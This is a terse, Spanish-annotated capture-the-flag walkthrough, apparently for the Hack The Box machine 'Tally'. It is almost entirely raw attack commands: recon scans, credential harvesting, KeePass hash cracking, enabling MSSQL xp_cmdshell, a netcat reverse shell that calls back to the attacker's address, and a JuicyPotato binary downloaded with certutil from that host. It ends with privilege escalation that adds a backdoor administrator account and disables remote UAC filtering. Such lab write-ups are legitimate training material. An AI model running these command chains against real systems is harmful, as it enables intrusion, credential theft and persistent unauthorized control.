nmap -A -p- -oA output 10.129.1.183 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210831134431.png

nmap -sC -sV -O -p- -oA tally 10.129.1.183

nmap -sU -O -p- -oA tally-udp 10.129.1.183

nikto -h 10.129.1.183:80

Pasted image 20210831134814.png

Pasted image 20210831134838.png

Pasted image 20210831134907.png

whatweb 10.129.1.183

Pasted image 20210831135351.png

crackmapexec smb 10.129.1.183

Pasted image 20210831135527.png

https://pentest-tools.com/public/sample-reports/sharepoint-scan-sample-report.pdf

Pasted image 20210831135853.png

http://10.129.1.183/sitepages/FinanceTeam.aspx

Pasted image 20210831140734.png

http://10.129.1.183/shared documents/forms/allitems.aspx

Pasted image 20210831141003.png

credenciales ftp_user:UTDRSCH53c"$6hys

Pasted image 20210831142506.png

ftp 10.129.1.183

con las credenicales de arriba

Pasted image 20210831142709.png

curlftpfs ftp_user:''UTDRSCH53c"$6hys"@10.129.1.183 /mnt/ftp

cd !$

ll

Pasted image 20210831143124.png

tree .

Vemos el archivo tim.kdbx

Pasted image 20210831143507.png

Adquirimos el hash y lo ponemos en un archivo llamado hash.

keepass2john tim.kdbx

john --wordlists=/usr/share/wordlists/rockyou.txt hash

Pasted image 20210831143912.png

Vemos el resultado 'simplementeyo'

Pasted image 20210831144020.png

Finance:Acc0unting

Pasted image 20210831144139.png

smbclient -L 10.129.1.183 -U "Finance%Acc0unting"

Pasted image 20210831144326.png

smbclient -L 10.129.1.183 -U "Finance%Acc0unting" -c "dir"

Pasted image 20210831144438.png

mkdir /mnt/smb

mount -t cifs

mount -t cifs //10.129.1.183/ACCT /mnt/smb -o username=Finance,password=Acc0unting,domain=WORKGROUP,rw

cd /mnt/smb

Pasted image 20210831144818.png

cd zz_Migration

cd Binaries

Pasted image 20210831145030.png

radare2 tester.exe

aaa

Pasted image 20210831145447.png

s main

pdf

Pasted image 20210831145606.png

credenciales GWE3V65#6KFH93@4GWTG2G

Pasted image 20210831145643.png

strings tester.exe | grep 'PWD' | tr ';' '\n' | cat

Pasted image 20210831145835.png

sqsh -S 10.129.1.183 -U 'sa'

Pasted image 20210831150056.png

sp_configure "show advanced options", 1

reconfigure

go

sp_configure "xp_cmdshell", 1

reconfigure

go

Pasted image 20210831150446.png

python3 /opt/impacket/mssqlclient.py WORKGROUP/sa@10.129.1.183

Pasted image 20210831150827.png

xp_cmdshell "\\10.10.14.125\smbFolder\nc.exe -e cmd 10.10.14.125 443"

nc -lvnp 443

python3 /opt/impacket/examples/smbserver smbFolder $(pwd) -smb2support

Pasted image 20210831151532.png

Podemos usar juicy potato

whoami /priv

Pasted image 20210831151848.png

python3 -m http.server 80

cd C:\Windows\Temp

mkdir privesc

cd privesc

certutil.exe -f -urlcache -split http://10.10.14.125/JuicyPotato.exe juicy.exe

Pasted image 20210831152500.png

juicy.exe =t * -l 1337 -p C:\Windows\System32\cmd.exe -a '/c net user cu3rv0x password123$ /add'

net user cu3rv0x

Pasted image 20210831153105.png

C:\Windows\Temp\privesc\juicy.exe -t * -l 1337 -p C:\Windows\System32\cmd.exe -a "/c net localgroup Administrators cu3rv0x /add"

Pasted image 20210831153159.png

C:\Windows\Temp\privesc\juicy.exe -t * -l 1337 -p C:\Windows\System32\cmd.exe -a "/c net share attacker_folder=C:\Windows\Temp /GRANT:Administrators,FULL"

Pasted image 20210901081708.png

C:\Windows\Temp\privesc\juicy.exe -t * -l 1337 -p C:\Windows\System32\cmd.exe -a "/c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f"

Pasted image 20210901081603.png

crackmapexec smb 10.129.1.183 -u 'cu3rv0x' -p 'password123$'

Pasted image 20210901081920.png

python3 /opt/impacket/examples/psexec.py WORKGROUP/cu3rv0x@10.129.1.183 cmd.exe

Pasted image 20210901082414.png

boxes

copyright©2022 Cu3rv0x all rights reserved